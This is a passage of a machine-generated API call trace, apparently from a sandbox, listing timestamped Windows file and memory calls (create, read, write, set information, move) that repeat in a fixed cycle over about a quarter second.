{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,068", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,078", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,088", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,098", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtReadFile"}, {"category": "filesystem", 